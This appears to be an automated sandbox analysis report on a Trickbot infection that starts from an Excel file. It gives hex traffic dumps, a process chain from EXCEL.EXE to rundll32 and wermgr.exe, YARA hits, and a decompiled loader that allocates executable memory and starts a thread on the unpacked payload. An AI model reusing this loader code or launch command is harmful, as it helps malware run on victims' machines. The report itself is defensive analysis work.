                                                                                                                                                                  Apr 12, 2021 17:12:29.014733076 CEST984INData Raw: 00 c7 45 d4 c3 68 13 00 03 ce 66 0f 6e 45 d4 0f b7 1b f3 0f e6 c0 f2 0f 11 45 d0 66 0f 6e c0 f3 0f e6 c0 89 45 d4 f2 0f 11 45 d0 89 45 d4 8b 45 f0 35 a1 54 cc bf 3b d0 75 38 8b 04 99 ba c3 68 13 00 03 c6 a3 28 90 00 10 66 0f 6e c2 f3 0f e6 c0 f2
                                                                                                                                                                  Data Ascii: EhfnEEfnEEEE5T;u8h(fnEfnUEUME5T;u8h,fnEfnUEUME5T;u5h0fnEfnUEUM
                                                                                                                                                                  Apr 12, 2021 17:12:29.014750004 CEST985INData Raw: 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 f8 89 5d fc 8b 5d 14 85 db 74 06 8b 44 ca 7c 89 03 80 7d 0c 00 bb c3 68 13 00 66 0f 6e c3 f3 0f e6 c0 f2 0f 11 45 f8 89 5d fc 0f 84 db 00 00 00 8d 04 3e e9 65 01 00 00 b9 64 86 00 00 66 3b c1 0f 85 d5 00 00 00
                                                                                                                                                                  Data Ascii: fnE]]tD|}hfnE]>edf;MfnEfn]E]9fnE];fnEfn]E]fnE]]t}
                                                                                                                                                                  Apr 12, 2021 17:12:29.014761925 CEST986INData Raw: f2 0f 11 45 dc 89 7d e0 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 dc 89 7d e0 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 dc 66 0f 6e c7 f3 0f e6 c0 89 7d e0 f2 0f 11 45 dc 66 0f 6e c7 f3 0f e6 c0 89 7d e0 f2 0f 11 45 dc 66 0f 6e c7 f3 0f e6 c0 89 7d e0 f2 0f
                                                                                                                                                                  Data Ascii: E}fnE}fnEfn}Efn}Efn}Efn}E}dffnf#J]MffEfn}UEfn}E}EEEhfnEEE
                                                                                                                                                                  Apr 12, 2021 17:12:29.014777899 CEST987INData Raw: 32 30 30 30 0d 0a ec 0f b7 c1 89 45 f0 b8 c3 68 13 00 0f b7 f9 f3 0f e6 c0 f2 0f 11 45 f8 89 45 fc 66 83 f9 03 75 1c 8b f8 8b 45 14 01 03 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 dc 89 7d 0c e9 7d 03 00 00 33 c9 41 66 3b f9 75 48 0f b7 0b 8b f8 8b 45
                                                                                                                                                                  Data Ascii: 2000EhEEfuEfnE}}3Af;uHEfnfEfn}Efn}E}-~JEfnEMUt'fnEfn}E}fnEM
                                                                                                                                                                  Apr 12, 2021 17:12:29.014792919 CEST988INData Raw: f3 0f e6 c0 ff 75 10 f2 0f 11 45 f4 89 4d f8 66 0f 6e c1 f3 0f e6 c0 ff 75 0c f2 0f 11 45 f4 89 4d f8 66 0f 6e c1 f3 0f e6 c0 50 8d 42 f8 d1 e8 50 f2 0f 11 45 f4 89 4d f8 66 0f 6e c1 f3 0f e6 c0 f2 0f 11 45 f4 66 0f 6e c1 f3 0f e6 c0 89 4d f8 f2
                                                                                                                                                                  Data Ascii: uEMfnuEMfnPBPEMfnEfnMEfnMEMMEhfnEQEEh.hfnEfnMEMt39],8GfnEMtfnEMf
                                                                                                                                                                  Apr 12, 2021 17:12:29.014842987 CEST990INData Raw: 66 0f 6e c7 f3 0f e6 c0 f2 0f 11 45 e8 66 0f 6e c7 f3 0f e6 c0 89 7d ec f2 0f 11 45 e8 89 7d ec eb 03 33 db 43 66 0f 6e c7 8b c3 f3 0f e6 c0 f2 0f 11 45 e8 66 0f 6e c7 f3 0f e6 c0 89 7d ec f2 0f 11 45 e8 89 7d ec 5f 5e 5b 8b e5 5d c3 55 8b ec 51
                                                                                                                                                                  Data Ascii: fnEfn}E}3CfnEfn}E}_^[]UQQShVuW}fnEfn]E]$fnE]tefnE]FGfnEfn]Efn]E];tfnE]
                                                                                                                                                                  Apr 12, 2021 17:12:29.145554066 CEST994INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                  Data Ascii:


                                                                                                                                                                  Code Manipulations

                                                                                                                                                                  Statistics

                                                                                                                                                                  CPU Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Memory Usage

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Behavior

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  System Behavior

                                                                                                                                                                  Analysis Process: EXCEL.EXE PID: 6276 Parent PID: 792

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:12:22
                                                                                                                                                                  Start date:12/04/2021
                                                                                                                                                                  Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                                  Imagebase:0xf50000
                                                                                                                                                                  File size:27110184 bytes
                                                                                                                                                                  MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  Chronological Activities

                                                                                                                                                                  Analysis Process: rundll32.exe PID: 6624 Parent PID: 6276

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:12:29
                                                                                                                                                                  Start date:12/04/2021
                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:rundll32 ..\fdinmd.fii,StartW
                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                  File size:61952 bytes
                                                                                                                                                                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000001.00000002.236724991.0000000003FB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_TrickBot_4, Description: Yara detected Trickbot, Source: 00000001.00000002.236774437.0000000004030000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  Chronological Activities

                                                                                                                                                                  Analysis Process: wermgr.exe PID: 6676 Parent PID: 6624

                                                                                                                                                                  General

                                                                                                                                                                  Start time:17:12:30
                                                                                                                                                                  Start date:12/04/2021
                                                                                                                                                                  Path:C:\Windows\System32\wermgr.exe
                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                  Commandline:C:\Windows\system32\wermgr.exe
                                                                                                                                                                  Imagebase:
                                                                                                                                                                  File size:209312 bytes
                                                                                                                                                                  MD5 hash:FF214585BF10206E21EA8EBA202FACFD
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high

                                                                                                                                                                  Chronological Activities

                                                                                                                                                                  Disassembly

                                                                                                                                                                  Code Analysis

                                                                                                                                                                  Reset < >

                                                                                                                                                                    Analysis Process: rundll32.exe PID: 6624 Parent PID: 6276 rundll32.exeCOMMON

                                                                                                                                                                    Execution Graph

                                                                                                                                                                    Execution Coverage:22.3%
                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                    Total number of Nodes:15
                                                                                                                                                                    Total number of Limit Nodes:1

                                                                                                                                                                    Graph

                                                                                                                                                                    execution_graph 112 4063780 SetTimer 113 4063797 GetMessageW 112->113 114 40637ab 113->114 116 40637bd 113->116 115 40637bf DispatchMessageW 114->115 114->116 115->113 117 406380b VirtualAlloc 116->117 119 406383c 116->119 117->116 118 406382b Sleep 117->118 118->116 120 4063852 CreateThread SetTimer 119->120 121 406387a GetMessageW 120->121 125 4070000 120->125 122 40638a0 121->122 123 406388e 121->123 123->122 124 40638a2 DispatchMessageW 123->124 124->121 126 407000e 125->126

                                                                                                                                                                    Callgraph

                                                                                                                                                                    Executed Functions

                                                                                                                                                                    Function 04063780, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowtimesleepCOMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                    			E04063780() {
				_Unknown_base(*)()* _v8;
				void* _v12;
				struct tagMSG _v40;
				long _v44;
				struct HWND__* _v48;
				long _v52;
				void* _v56;
				void* _t38;
				void* _t43;
				int _t45;

				SetTimer(0, 0, 0x25b, 0); // executed
				while(GetMessageW( &_v40, 0, 0, 0) != 0) {
					_v40.message = _v40.message + 1;
					if(_v40.message != 0x114) {
						DispatchMessageW( &_v40);
						continue;
					} else {
					}
					break;
				}
				_v12 = 0;
				_v48 = 0;
				_v52 = 0x5000;
				while(_v52 > 0x1000) {
					_v52 = _v52 - 1;
				}
				_v44 = _v52;
				while(_v44 > 0x40) {
					_v44 = _v44 - 1;
				}
				do {
					_t38 = VirtualAlloc(_v12, 0x43000, _v52, _v44); // executed
					_v8 = _t38;
					if(_v8 == 0) {
						Sleep(0x1f4);
					}
				} while (_v8 == 0);
				_v48 =  &(_v48->i);
				E04063740(_v48, _v8);
				_t43 = CreateThread(0, 0, _v8, 1, 0, 0); // executed
				_v56 = _t43;
				SetTimer(0, 0, 0x2000, 0); // executed
				while(1) {
					_t45 = GetMessageW( &_v40, 0, 0, 0);
					if(_t45 == 0) {
						break;
					}
					_v40.message = _v40.message + 1;
					if(_v40.message == 0x114) {
						return _t45;
					}
					DispatchMessageW( &_v40);
				}
				return _t45;
			}













                                                                                                                                                                    0x04063791
                                                                                                                                                                    0x04063797
                                                                                                                                                                    0x040637b1
                                                                                                                                                                    0x040637bb
                                                                                                                                                                    0x040637c3
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x040637bd
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x040637bb
                                                                                                                                                                    0x040637cb
                                                                                                                                                                    0x040637d2
                                                                                                                                                                    0x040637d9
                                                                                                                                                                    0x040637e0
                                                                                                                                                                    0x040637ef
                                                                                                                                                                    0x040637ef
                                                                                                                                                                    0x040637f7
                                                                                                                                                                    0x040637fa
                                                                                                                                                                    0x04063806
                                                                                                                                                                    0x04063806
                                                                                                                                                                    0x0406380b
                                                                                                                                                                    0x0406381c
                                                                                                                                                                    0x04063822
                                                                                                                                                                    0x04063829
                                                                                                                                                                    0x04063830
                                                                                                                                                                    0x04063830
                                                                                                                                                                    0x04063836
                                                                                                                                                                    0x04063842
                                                                                                                                                                    0x0406384d
                                                                                                                                                                    0x04063860
                                                                                                                                                                    0x04063866
                                                                                                                                                                    0x04063874
                                                                                                                                                                    0x0406387a
                                                                                                                                                                    0x04063884
                                                                                                                                                                    0x0406388c
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x04063894
                                                                                                                                                                    0x0406389e
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x00000000
                                                                                                                                                                    0x040638a6
                                                                                                                                                                    0x040638a6
                                                                                                                                                                    0x040638b1

                                                                                                                                                                    APIs
                                                                                                                                                                    • SetTimer.USER32 ref: 04063791
                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 040637A1
                                                                                                                                                                    • DispatchMessageW.USER32 ref: 040637C3
                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00043000,00001000,00000040), ref: 0406381C
                                                                                                                                                                    • Sleep.KERNEL32(000001F4), ref: 04063830
                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000000), ref: 04063860
                                                                                                                                                                    • SetTimer.USER32 ref: 04063874
                                                                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 04063884
                                                                                                                                                                    • DispatchMessageW.USER32 ref: 040638A6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.236774437.0000000004030000.00000040.00000001.sdmp, Offset: 04030000, based on PE: true
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4030000_rundll32.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$DispatchTimer$AllocCreateSleepThreadVirtual
                                                                                                                                                                    • String ID: @
                                                                                                                                                                    • API String ID: 368155642-2766056989
                                                                                                                                                                    • Opcode ID: 496c8774a3f5ec037b8bf23d6e6358b4b63a0b619cce4954bb749a3fe6a8ba41
                                                                                                                                                                    • Instruction ID: 47c340a93a5c949bd438ba6c48232facc218ea93e091315bcff16f59df542810
                                                                                                                                                                    • Opcode Fuzzy Hash: 496c8774a3f5ec037b8bf23d6e6358b4b63a0b619cce4954bb749a3fe6a8ba41
                                                                                                                                                                    • Instruction Fuzzy Hash: 2741C670A44218EFEB14CFA4DD49FDDBBB4FB48B05F104119EA077A280D779B9409B69
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04072720, Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 22 4072720-4072766 23 4072768-4072774 22->23 23->23 24 4072776-4072782 23->24 25 4072784-407278d 24->25 26 407278e-40727c8 24->26 25->26 32 40727cb-40727d4 26->32 33 40727da-4072808 32->33 35 4072817-407282d 33->35 36 407280a-4072813 33->36 36->35
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp, Offset: 04070000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4070000_rundll32.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: acd603c988a59336cb80770da4cb7366b2a1490a3f044f33b06c58e03abc8b05
                                                                                                                                                                    • Instruction ID: 8d7e1490ef5ea54b552c199911c267cd5fa8441b4287f94200aaef173d1bd168
                                                                                                                                                                    • Opcode Fuzzy Hash: acd603c988a59336cb80770da4cb7366b2a1490a3f044f33b06c58e03abc8b05
                                                                                                                                                                    • Instruction Fuzzy Hash: E7411AB5604205AFEB08CF18D949D6ABBEDFB48225B10855DF809CB341DA31ED41CBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 040727CB, Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                    • Executed
                                                                                                                                                                    • Not Executed
                                                                                                                                                                    control_flow_graph 37 40727cb-40727d4 38 40727da-4072808 37->38 40 4072817-407282d 38->40 41 407280a-4072813 38->41 41->40
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.236801064.0000000004070000.00000040.00000001.sdmp, Offset: 04070000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_4070000_rundll32.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e33fe5da96f720e4fe6e238dac6dffeaa3174ff5709e0af4cc75d5c3c910f501
                                                                                                                                                                    • Instruction ID: fec8902ca0489efd360ec096d71ec415a4c027945833c47a1cecfe409a6af7fb
                                                                                                                                                                    • Opcode Fuzzy Hash: e33fe5da96f720e4fe6e238dac6dffeaa3174ff5709e0af4cc75d5c3c910f501
                                                                                                                                                                    • Instruction Fuzzy Hash: 6401E8B5A00209AFDB44DF18C84495ABBA9FF88314B15C999FC19CB301D731ED91CBA5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Non-executed Functions